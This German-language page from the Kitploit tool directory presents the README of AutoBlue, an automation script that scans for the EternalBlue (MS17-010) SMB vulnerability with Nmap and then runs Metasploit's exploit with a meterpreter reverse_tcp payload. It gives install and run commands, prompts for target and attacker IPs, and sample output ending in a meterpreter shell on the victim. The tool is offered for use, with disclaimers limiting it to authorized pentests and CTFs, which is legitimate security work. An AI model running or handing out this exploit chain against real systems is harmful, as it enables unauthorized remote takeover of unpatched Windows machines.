Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
autoblue — AutoBlue – Automatisiertes EternalBlue-Exploitationstool (CVE-2017-0144 / MS17-010), das Nmap und Metasploit für ethisches Hacking, Penetrationstests und CTF-Herausforderungen nutzt. Ausschließlich für autorisierte und Bildungszwecke bestimmt! | Kitploit
Tools/GitHubGitHub/atithkhawas/autoblue
SchwachstellenscannerPayload-GenerierungExploitationPost-ExploitationCTFPenetrationstestsLernen & BildungRed Teaming
GitHubatithkhawas/autoblue

autoblue

AutoBlue – Automatisiertes EternalBlue-Exploitationstool (CVE-2017-0144 / MS17-010), das Nmap und Metasploit für ethisches Hacking, Penetrationstests und CTF-Herausforderungen nutzt. Ausschließlich für autorisierte und Bildungszwecke bestimmt!

Repository anzeigen
413vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

AUTOBLUE: Automatisiertes EternalBlue-Exploit-Tool

AUTOBLUE ist ein Automatisierungstool, das dazu entwickelt wurde, die EternalBlue-Sicherheitslücke (CVE-2017-0144) auf Windows-Maschinen auszunutzen. Das Tool vereint die Leistungsfähigkeit von Nmap für die Schwachstellensuche und Metasploits msfconsole für die Ausnutzung, sodass Benutzer automatisch anfällige Systeme identifizieren und den EternalBlue-Exploit starten können, um Fernzugriff auf das Ziel zu erhalten.

Dieses Tool wurde in erster Linie für Sicherheitsexperten, Penetrationstester und ethische Hacker entwickelt, die in kontrollierten, autorisierten Umgebungen wie Capture-The-Flag (CTF)-Herausforderungen, Penetrationstest-Einsätzen oder Laborumgebungen arbeiten. AUTOBLUE ermöglicht es Benutzern, die EternalBlue-Sicherheitslücke mit minimalem manuellem Eingriff auszunutzen, indem sie einfach die Ziel-IP-Adresse eingeben.

Funktionen

  • Automatisierte Schwachstellensuche: Verwendet Nmap, um auf der Zielmaschine nach der EternalBlue-Sicherheitslücke (CVE-2017-0144) zu suchen.

  • Nahtlose Ausnutzung: Nutzt Metasploits msfconsole, um den EternalBlue-Exploit automatisch zu starten.

  • Einfache Einrichtung: Erfordert lediglich eine Ziel-IP-Adresse und eine funktionierende Umgebung mit installierten Nmap und Metasploit.

  • Ausgabebericht: Erzeugt eine Ausgabe, die den Erfolg oder Misserfolg des Exploit-Versuchs anzeigt.

Inhaltsverzeichnis

  • Voraussetzungen

  • Installation

  • Verwendung

  • Funktionsweise

  • Sicherheitshinweise

Mitwirken

  • Lizenz

  • Danksagungen

  • Haftungsausschluss

  • Voraussetzungen:

    Bevor Sie AUTOBLUE verwenden, stellen Sie sicher, dass die folgenden Tools auf Ihrem System installiert sind:

    Nmap: Ein Netzwerkscan-Tool zur Erkennung anfälliger Maschinen.

    Metasploit Framework: Eine Penetrationstest-Plattform, die Exploits für EternalBlue enthält.

    Nmap installieren:

    • Unter Linux (Debian-basiert):

    Code kopieren

    root@kitploit:~
          sudo apt update
    

    und

    root@kitploit:~
          sudo apt install nmap
    

    Unter Windows oder macOS laden Sie Nmap von der offiziellen Website herunter.

    Metasploit installieren:

    Unter Linux (Debian-basiert):

    Code kopieren

    root@kitploit:~
          sudo apt update
    

    und

    root@kitploit:~
         sudo apt install metasploit-framework
    

    Unter Windows oder macOS laden Sie Metasploit von der offiziellen Website herunter.

    Installation:

    Um AUTOBLUE zu installieren, führen Sie die folgenden Schritte aus:

    • Repository klonen:

      root@kitploit:~
        git clone https://github.com/AtithKhawas/autoblue.git
      

      und

      root@kitploit:~
           cd autoblue
      

    Stellen Sie sicher, dass Nmap und Metasploit als Voraussetzungen korrekt installiert sind.

    • Skript ausführbar machen:

      root@kitploit:~
      chmod +x autoblue.sh
      

    Verwendung:

    AUTOBLUE wurde entwickelt, um die Suche und Ausnutzung der EternalBlue-Sicherheitslücke zu automatisieren. So verwenden Sie es:

    • Tool ausführen

    Um AUTOBLUE zu verwenden, führen Sie den folgenden Befehl in Ihrem Terminal aus:

    Code kopieren

    root@kitploit:~
         ./autoblue.sh 
    

    Ausgabe:

    root@kitploit:~
         ┌──(root㉿kali)-[/home/Elliot] 
         └─# ./autoblue.sh 
         ============================================
         ********************************************
         AutoBlue    - EternalBlue Exploit Automation
         ********************************************
         ********************************************
         ------------------------Made by ATITH KHAWAS
         ============================================
         Enter Target IP Address:
    

    Es wird nach der Ziel-IP-Adresse und Ihrer gefragt.

    Beispiel

    root@kitploit:~
          Enter Target IP Address: Ziel<IP-Adresse>
          Enter Your IP Address: Ihre <IP-Adresse>
    

    Sobald Sie das Tool ausführen, beginnt es mit dem Scan mit Nmap:

    Ausgabe-1

    root@kitploit:~
     Target IP Address: ***.***.**.**
     [+] Scanning Target for MS17-010 Vulnerability...
     Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
     Nmap scan report for ***.***.**.**
     Host is up (0.19s latency).
    
     PORT    STATE SERVICE
     445/tcp open  microsoft-ds
    
     Host script results:
     | smb-vuln-ms17-010: 
     |   VULNERABLE:
     |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
     |     State: VULNERABLE
     |     IDs:  CVE:CVE-2017-0143
     |     Risk factor: HIGH
     |       A critical remote code execution vulnerability exists in Microsoft SMBv1
     |        servers (ms17-010).
     |           
     |     Disclosure date: 2017-03-14
     |     References:
     |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
     |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
     |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    
     Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
     [+] Target is VULNERABLE to EternalBlue!
    

    Hier beginnt die eigentliche Arbeit, die den zeitaufwändigen Prozess erheblich verkürzt. Wenn das Ziel anfällig ist, startet es automatisch die Msfconsole und setzt RHOSTS, PAYLOAD, LHOST und LPORT mit dem Standardport 4444.

    Ausgabe-2

    root@kitploit:~
          [+] Launching Metasploit...
          [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
          RHOSTS => ***.***.**.**
          PAYLOAD => windows/x64/meterpreter/reverse_tcp
          LHOST => ***.***.**.**
          LPORT => 4444
          [*] Started reverse TCP handler on ***.***.**.**:4444 
    

    Und liefert uns die Meterpreter-Shell des Ziels.

    Ausgabe-3

    root@kitploit:~
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
           meterpreter > pwd
           C:\Windows\system32
    

    Funktionsweise:

    • Nmap-Skript-Scan: Das Tool verwendet zunächst einen Nmap-Skript-Scan (--script smb-vuln-ms17-010), um zu erkennen, ob die Zielmaschine anfällig für den EternalBlue-Exploit ist. Es überprüft, ob Port 445 geöffnet ist, und versucht, SMB-Schwachstellen zu identifizieren.

    • Metasploit-Exploit: Wenn die Zielmaschine als anfällig erkannt wird, startet AUTOBLUE den EternalBlue-Exploit mithilfe von Metasploits msfconsole. Das Skript konfiguriert und sendet die erforderliche Payload, um die Schwachstelle auszunutzen.

    • Reverse Shell: Bei erfolgreichem Exploit wird eine Reverse-Shell geöffnet, die eine Befehlszeilenschnittstelle auf dem Opferrechner bereitstellt.

    • Rückmeldung: Das Tool gibt während des gesamten Prozesses Rückmeldungen, einschließlich der Information, ob das Ziel erfolgreich ausgenutzt wurde, und gibt relevante Informationen aus (z. B. IP-Adresse der Reverse-Shell).

    Sicherheitshinweise:

    • Rechtmäßige Nutzung: Dieses Tool sollte nur in autorisierten Umgebungen verwendet werden. Stellen Sie sicher, dass Sie die ausdrückliche Erlaubnis haben, die Zielmaschine zu testen, und dass dies in Ihrer Gerichtsbarkeit nicht illegal ist.

    • Benutzereingabe: Stellen Sie sicher, dass nur vertrauenswürdige IPs in das Tool eingegeben werden, um Missbrauch zu verhindern. Das Ausführen dieses Tools auf nicht vertrauenswürdigen Systemen kann zu Sicherheitsvorfällen führen.

    • Payload-Sicherheit: Die in diesem Tool verwendete Reverse-Shell-Payload ist von Natur aus riskant. Setzen Sie die Angriffsmaschine oder ihre Listener keinen nicht vertrauenswürdigen Netzwerken aus.

    • Abhängigkeiten aktualisieren: Aktualisieren Sie Nmap und Metasploit regelmäßig, um bekannte Sicherheitslücken in diesen Tools zu beheben.

    Mitwirken:

    Beiträge zum AUTOBLUE-Projekt sind willkommen. Wenn Sie Vorschläge, Verbesserungen oder Fehlerbehebungen haben, können Sie das Repository forken und einen Pull-Request erstellen.

    Lizenz:

    Dieses Tool ist Open Source und unter der MIT-Lizenz veröffentlicht. Sie können die Software in Ihren eigenen Projekten frei verwenden, modifizieren und verbreiten. Sie müssen diesen Hinweis jedoch in allen Kopien oder wesentlichen Teilen der Software beifügen.

    Danksagungen:

    • Nmap: Für die Bereitstellung der wesentlichen Schwachstellensuchfunktionalität.

    • Metasploit: Für die Bereitstellung des Frameworks zur Ausnutzung der EternalBlue-Sicherheitslücke.

    • Sicherheitsforscher: Für die Entdeckung und öffentliche Offenlegung der EternalBlue-Sicherheitslücke, die dazu beigetragen hat, Systeme weltweit zu sichern.

    Haftungsausschluss:

    AUTOBLUE ist ein Tool, das nur für Bildungs- und ethische Zwecke bestimmt ist. Die Autoren übernehmen keine Verantwortung für illegale Handlungen, die mit diesem Tool durchgeführt werden. Es liegt in Ihrer Verantwortung, sicherzustellen, dass Sie die ausdrückliche Erlaubnis haben, Penetrationstests an einem System durchzuführen.

    Verwenden Sie dieses Tool auf eigenes Risiko. Führen Sie Penetrationstests immer in einer sicheren und legalen Umgebung durch.

    Tool herunterladen